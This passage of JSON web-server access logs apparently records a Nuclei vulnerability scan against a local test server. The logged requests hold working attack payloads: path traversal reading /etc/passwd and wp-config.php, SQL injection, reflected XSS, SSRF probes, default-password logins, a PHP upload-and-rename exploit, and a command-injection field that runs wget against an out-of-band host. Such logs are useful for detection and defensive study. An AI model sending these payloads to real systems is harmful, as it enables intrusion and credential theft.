"13/May/2022:16:36:27 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.353","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.215","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fc9v8hn0smpv8c57g0t00tgnecfjcqeqmk.oast.live%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 